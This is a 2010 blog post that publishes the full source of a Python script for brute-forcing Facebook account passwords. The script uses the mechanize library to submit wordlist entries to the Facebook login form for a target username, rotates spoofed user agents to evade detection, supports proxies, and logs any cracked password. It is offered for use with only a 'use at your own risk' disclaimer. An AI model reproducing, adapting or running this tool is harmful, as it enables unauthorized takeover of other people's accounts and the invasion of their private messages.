Monday, September 6, 2010

fbruteforcer.py
This is facebook bruteforcer utility…
Using mechanize module make the program like browser simulation, and cookielib for cookie handling…
Full python error handling…
Use this at your own risk .
view source
print?
001#!/usr/bin/python
002# This is facebook bruteforcer tools
003# This was written for educational purpose and pentest only. Use it at your own risk.
004# Author will not be responsible for any damage !!
005# Toolname  : facebookbruteforcer.py
006# Programmer    : Gunslinger_
007# Version   : 1.0
008# Date      : Tue Jul 27 13:24:44 WIT 2010
009# Special thanks to mywisdom to inspire me ;)
010 
011import re
012import os
013import sys
014import random
015import warnings
016import time
017try:
018    import mechanize
019except ImportError:
020    print "[*] Please install mechanize python module first"
021    sys.exit(1)
022except KeyboardInterrupt:
023    print "\n[*] Exiting program...\n"
024    sys.exit(1)
025try:
026    import cookielib
027except ImportError:
028    print "[*] Please install cookielib python module first"
029    sys.exit(1)
030except KeyboardInterrupt:
031    print "\n[*] Exiting program...\n"
032    sys.exit(1)
033 
034warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
035 
036# define variable
037__programmer__  = "gunslinger_ "
038__version__     = "1.0"
039verbose     = False
040useproxy    = False
041usepassproxy    = False
042log     = 'fbbruteforcer.log'
043file        = open(log, "a")
044success     = 'http://www.facebook.com/?sk=messages&ref=mb'
045fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
046# some cheating ..
047ouruseragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
048        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
049        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
050        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
051            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
052            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
053            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
054            'Opera/8.00 (Windows NT 5.1; U; en)',
055        'amaya/9.51 libwww/5.4.0',
056        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
057        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
058        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
059        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
060        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
061        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
062        ]
063facebook    = '''
064  __               _                 _
065 / _|             | |               | |
066| |_ __ _  ___ ___| |__   ___   ___ | | __
067|  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
068| || (_| | (_|  __/ |_) | (_) | (_) |   <
069|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
070                    bruteforcer...
071 
072Programmer : %s
073Version    : %s''' % (__programmer__, __version__)
074option          = '''
075Usage  : %s [options]
076Option : -u, --username             |   User for bruteforcing
077         -w, --wordlist             |   Wordlist used for bruteforcing
078         -v, --verbose              |   Set %s will be verbose
079         -p, --proxy           |   Set http proxy will be use
080         -k, --usernameproxy        |   Set username at proxy will be use
081         -i, --passproxy        |   Set password at proxy will be use
082         -l, --log          |   Specify output filename (default : fbbruteforcer.log)
083         -h, --help                     |   Print this help
084 
085Example : %s -u brad@hackme.com -w wordlist.txt"
086 
087P.S : add "&" to run in the background
088''' % (sys.argv[0], sys.argv[0], sys.argv[0])
089hme         = '''
090Usage : %s [option]
091    -h or --help for get help
092    ''' % sys.argv[0]
093 
094def helpme():
095    print facebook
096    print option
097    file.write(facebook)
098    file.write(option)
099    sys.exit(1)
100 
101def helpmee():
102    print facebook
103    print hme
104    file.write(facebook)
105    file.write(hme)
106    sys.exit(1)
107 
108for arg in sys.argv:
109    try:
110        if arg.lower() == '-u' or arg.lower() == '--user':
111                    username = sys.argv[int(sys.argv[1:].index(arg))+2]
112        elif arg.lower() == '-w' or arg.lower() == '--wordlist':
113                    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
114            elif arg.lower() == '-l' or arg.lower() == '--log':
115                    log = sys.argv[int(sys.argv[1:].index(arg))+2]
116            elif arg.lower() == '-p' or arg.lower() == '--proxy':
117                useproxy = True
118                    proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
119            elif arg.lower() == '-k' or arg.lower() == '--userproxy':
120                usepassproxy = True
121                    usw = sys.argv[int(sys.argv[1:].index(arg))+2]
122            elif arg.lower() == '-i' or arg.lower() == '--passproxy':
123                usepassproxy = True
124                    usp = sys.argv[int(sys.argv[1:].index(arg))+2]
125        elif arg.lower() == '-v' or arg.lower() == '--verbose':
126                    verbose = True
127            elif arg.lower() == '-h' or arg.lower() == '--help':
128                helpme()
129        elif len(sys.argv) <= 1:
130            helpmee()
131    except IOError:
132        helpme()
133    except NameError:
134        helpme()
135    except IndexError:
136        helpme()
137 
138def bruteforce(word):
139    try:
140        sys.stdout.write("\r[*] Trying %s...                    " % word)
141        file.write("[*] Trying %s\n" % word)
142        sys.stdout.flush()
143        br.addheaders = [('User-agent', random.choice(ouruseragent))]
144        opensite = br.open(fblogin)
145        br.select_form(nr=0)
146        br.form['email'] = username
147        br.form['pass'] = word
148        br.submit()
149        response = br.response().read()
150        if verbose:
151            print response
152        if success in response:
153            print "\n\n[*] Logging in success..."
154            print "[*] Username : %s" % (username)
155            print "[*] Password : %s\n" % (word)
156            file.write("\n[*] Logging in success...")
157            file.write("\n[*] Username : %s" % (username))
158            file.write("\n[*] Password : %s\n\n" % (word))
159            sys.exit(1)
160    except KeyboardInterrupt:
161        print "\n[*] Exiting program...\n"
162        sys.exit(1)
163    except mechanize._mechanize.FormNotFoundError:
164        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
165        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
166        sys.exit(1)
167    except mechanize._form.ControlNotFoundError:
168        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
169        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
170        sys.exit(1)
171 
172def releaser():
173    global word
174    for word in words:
175        bruteforce(word.replace("\n",""))
176 
177def main():
178    global br
179    global words
180    try:
181        br = mechanize.Browser()
182        cj = cookielib.LWPCookieJar()
183        br.set_cookiejar(cj)
184        br.set_handle_equiv(True)
185        br.set_handle_gzip(True)
186        br.set_handle_redirect(True)
187        br.set_handle_referer(True)
188        br.set_handle_robots(False)
189        br.set_debug_http(False)
190        br.set_debug_redirects(False)
191        br.set_debug_redirects(False)
192        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
193        if useproxy:
194            br.set_proxies({"http": proxy})
195        if usepassproxy:
196            br.add_proxy_password(usw, usp)
197        if verbose:
198            br.set_debug_http(True)
199            br.set_debug_redirects(True)
200            br.set_debug_redirects(True)
201    except KeyboardInterrupt:
202        print "\n[*] Exiting program...\n"
203        file.write("\n[*] Exiting program...\n")
204        sys.exit(1)
205    try:
206        preventstrokes = open(wordlist, "r")
207        words          = preventstrokes.readlines()
208        count          = 0
209        while count < len(words):
210            words[count] = words[count].strip()
211            count += 1
212    except IOError:
213        print "\n[*] Error: Check your wordlist path\n"
214        file.write("\n[*] Error: Check your wordlist path\n")
215        sys.exit(1)
216    except NameError:
217        helpme()
218    except KeyboardInterrupt:
219        print "\n[*] Exiting program...\n"
220        file.write("\n[*] Exiting program...\n")
221        sys.exit(1)
222    try:
223        print facebook
224        print "\n[*] Starting attack at %s" % time.strftime("%X")
225        print "[*] Account for bruteforcing %s" % (username)
226        print "[*] Loaded :",len(words),"words"
227        print "[*] Bruteforcing, please wait..."
228        file.write(facebook)
229        file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
230        file.write("\n[*] Account for bruteforcing %s" % (username))
231        file.write("\n[*] Loaded : %d words" % int(len(words)))
232        file.write("\n[*] Bruteforcing, please wait...\n")
233    except KeyboardInterrupt:
234        print "\n[*] Exiting program...\n"
235        sys.exit(1)
236    try:
237        releaser()
238        bruteforce(word)
239    except NameError:
240        helpme()
241 
242if __name__ == '__main__':
243    main()
facebook brute forcer written in python mechanize
This Share Facebook Posted by at 12:31 AM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Template by : mhiman@ hacker-newbie.org